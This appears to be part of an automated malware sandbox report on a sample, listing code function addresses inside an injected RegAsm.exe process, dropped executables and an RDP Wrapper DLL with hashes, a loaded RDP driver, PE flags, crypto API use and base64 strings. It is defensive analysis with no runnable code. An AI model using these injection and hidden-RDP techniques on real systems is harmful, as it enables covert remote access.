Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CB462C0	6_2_6CB462C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA98220	6_2_6CA98220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA8A210	6_2_6CA8A210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA48260	6_2_6CA48260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA58250	6_2_6CA58250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA1E3B0	6_2_6CA1E3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9F23A0	6_2_6C9F23A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA143E0	6_2_6CA143E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA32320	6_2_6CA32320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CB02370	6_2_6CB02370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CADC360	6_2_6CADC360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA56370	6_2_6CA56370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9C8340	6_2_6C9C8340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9C2370	6_2_6C9C2370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA5FC80	6_2_6CA5FC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA81CE0	6_2_6CA81CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CAFDCD0	6_2_6CAFDCD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9D1C30	6_2_6C9D1C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9C3C40	6_2_6C9C3C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CAE9C40	6_2_6CAE9C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9B3D80	6_2_6C9B3D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CB09D90	6_2_6CB09D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA91DC0	6_2_6CA91DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA23D00	6_2_6CA23D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9E3EC0	6_2_6C9E3EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CACDE10	6_2_6CACDE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CB1BE70	6_2_6CB1BE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CB45E60	6_2_6CB45E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9E1F90	6_2_6C9E1F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA6BFF0	6_2_6CA6BFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CADDFC0	6_2_6CADDFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CB43FC0	6_2_6CB43FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CB17F20	6_2_6CB17F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9B5F30	6_2_6C9B5F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9F5F20	6_2_6C9F5F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CB1B8F0	6_2_6CB1B8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA9F8F0	6_2_6CA9F8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA5F8C0	6_2_6CA5F8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9CD8E0	6_2_6C9CD8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9F38E0	6_2_6C9F38E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA1D810	6_2_6CA1D810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9D1980	6_2_6C9D1980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA91990	6_2_6CA91990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9F99D0	6_2_6C9F99D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA259F0	6_2_6CA259F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA579F0	6_2_6CA579F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA599C0	6_2_6CA599C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA75920	6_2_6CA75920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CB0F900	6_2_6CB0F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA3F960	6_2_6CA3F960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA7D960	6_2_6CA7D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA9DAB0	6_2_6CA9DAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9C1AE0	6_2_6C9C1AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9FFA10	6_2_6C9FFA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CABDA30	6_2_6CABDA30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA61A10	6_2_6CA61A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CB49A50	6_2_6CB49A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA19BA0	6_2_6CA19BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA89BB0	6_2_6CA89BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9B1B80	6_2_6C9B1B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CAA5B90	6_2_6CAA5B90
Source: C:\ProgramData\GIEHJDHCBA.exe	Code function: 12_2_01250C40	12_2_01250C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_004103A8	16_2_004103A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00447D38	16_2_00447D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00401000	16_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_004480B0	16_2_004480B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00449120	16_2_00449120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0040C1C0	16_2_0040C1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0042D250	16_2_0042D250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0040A231	16_2_0040A231
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0044A230	16_2_0044A230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_004012C7	16_2_004012C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_004452E0	16_2_004452E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00415352	16_2_00415352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00407450	16_2_00407450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00409402	16_2_00409402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_004404AB	16_2_004404AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0044A510	16_2_0044A510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_004115B0	16_2_004115B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0041D610	16_2_0041D610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00449620	16_2_00449620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0040A6E0	16_2_0040A6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0040B6B0	16_2_0040B6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0043F700	16_2_0043F700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0041E71A	16_2_0041E71A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0044B720	16_2_0044B720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_004087F0	16_2_004087F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00428833	16_2_00428833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_004338C0	16_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_004408E6	16_2_004408E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_004038A0	16_2_004038A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00434990	16_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0040ABA0	16_2_0040ABA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0042EBBC	16_2_0042EBBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00437CD0	16_2_00437CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00449D22	16_2_00449D22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00407E50	16_2_00407E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00427E6C	16_2_00427E6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00437F30	16_2_00437F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0042DFE0	16_2_0042DFE0
Source: C:\ProgramData\BKKFCFBKFC.exe	Code function: 17_2_03100C40	17_2_03100C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07FB9390	19_2_07FB9390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07FB226A	19_2_07FB226A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07FB9F80	19_2_07FB9F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07F9AEBE	19_2_07F9AEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07FB9A20	19_2_07FB9A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07F516D0	19_2_07F516D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07F29430	19_2_07F29430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07F433E0	19_2_07F433E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07F2A2C0	19_2_07F2A2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07F461E0	19_2_07F461E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07F4D100	19_2_07F4D100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07F4FD50	19_2_07F4FD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07F29CC0	19_2_07F29CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07F3DB30	19_2_07F3DB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07F53920	19_2_07F53920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07F2F8D0	19_2_07F2F8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07DD4CF0	19_2_07DD4CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07DD66C0	19_2_07DD66C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E06E80	19_2_07E06E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07DFCE10	19_2_07DFCE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07DCD57C	19_2_07DCD57C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07DEA560	19_2_07DEA560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07DF1C50	19_2_07DF1C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07DCEA80	19_2_07DCEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07DEBAB0	19_2_07DEBAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07DCF160	19_2_07DCF160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07DF7810	19_2_07DF7810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07DD9000	19_2_07DD9000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07F74FB2	19_2_07F74FB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07F55F40	19_2_07F55F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07EEF790	19_2_07EEF790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E58760	19_2_07E58760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E89770	19_2_07E89770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E7D6D0	19_2_07E7D6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E69690	19_2_07E69690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E5E630	19_2_07E5E630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E8E5C0	19_2_07E8E5C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07F085A0	19_2_07F085A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07EBA590	19_2_07EBA590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07EB8520	19_2_07EB8520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07ED7510	19_2_07ED7510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07EE24C0	19_2_07EE24C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E9A470	19_2_07E9A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07EB4440	19_2_07EB4440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E42450	19_2_07E42450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E6B3A0	19_2_07E6B3A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E553B0	19_2_07E553B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E62390	19_2_07E62390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E50350	19_2_07E50350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E8A330	19_2_07E8A330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07EBE2E0	19_2_07EBE2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07EB9190	19_2_07EB9190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07EA1129	19_2_07EA1129
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E48120	19_2_07E48120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E90110	19_2_07E90110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E7E0D0	19_2_07E7E0D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E92090	19_2_07E92090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E9B040	19_2_07E9B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07EE5040	19_2_07EE5040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E8B020	19_2_07E8B020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07EAD020	19_2_07EAD020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07EC4020	19_2_07EC4020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E95030	19_2_07E95030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07EE8030	19_2_07EE8030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E33000	19_2_07E33000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E77010	19_2_07E77010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07EAEE90	19_2_07EAEE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E9EE20	19_2_07E9EE20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E90D10	19_2_07E90D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E92CF0	19_2_07E92CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E50C70	19_2_07E50C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E39C20	19_2_07E39C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E8DB40	19_2_07E8DB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07EC4A60	19_2_07EC4A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07EE9A20	19_2_07EE9A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E39A10	19_2_07E39A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07EA69C0	19_2_07EA69C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E34970	19_2_07E34970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E75940	19_2_07E75940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07EBA940	19_2_07EBA940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07EB9950	19_2_07EB9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E79860	19_2_07E79860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07EFE800	19_2_07EFE800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07F5D7C0	19_2_07F5D7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07EA85C0	19_2_07EA85C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E99490	19_2_07E99490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E4D030	19_2_07E4D030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E97E90	19_2_07E97E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E3BE60	19_2_07E3BE60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07F0CC30	19_2_07F0CC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E439A0	19_2_07E439A0

Source: Joe Sandbox View	Dropped File: C:\Program Files\RDP Wrapper\rdpwrap.dll 798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
Source: Joe Sandbox View	Dropped File: C:\ProgramData\BKKFCFBKFC.exe 05C67A9765FE1EBEBCEDAEE376F87A803D7CD37E6C5C19F7D336C2F14A4EF207

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6CA1C5E0 appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6CAF9F30 appears 32 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00410609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6CB4D930 appears 53 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C9E3620 appears 85 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6CB409D0 appears 288 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040CC80 appears 44 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0041D1E0 appears 164 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6CB4DAE0 appears 65 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004104E7 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C9E9B10 appears 90 times

Source: file.exe

Static PE information: invalid certificate

Source: file.exe, 00000002.00000002.1333068939.000000000155E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameVQP.exeD vs file.exe

Source: unknown

Driver loaded: C:\Windows\System32\drivers\rdpvideominiport.sys

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: GIEHJDHCBA.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66f5dbaca34ac_lfdnsafnds[1].exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: BKKFCFBKFC.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66f5db9e54794_vfkagks[1].exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66f5de72d9ebd_rdp[1].exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: CFHIIEHJKK.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 66f5de72d9ebd_rdp[1].exe.6.dr, -Module-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: CFHIIEHJKK.exe.6.dr, -Module-.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 66f5de72d9ebd_rdp[1].exe.6.dr, UHJvZ3JhbUFB.cs	Base64 encoded string: 'LROw/ocyJreQVkBTZvl7OBssok9gw2ju6Qfe7b+JT01lW9MUPsj68DhkAI4ibyqjKCtcLKeJNYA='
Source: 66f5de72d9ebd_rdp[1].exe.6.dr, QXNzZW1ibHlMb2FkZXJB.cs	Base64 encoded string: 'YWrJ2+g0t2313nx3LyyJJhh5Cws2Jt788zD4XGLCyNPviMBR5z8ILg=='
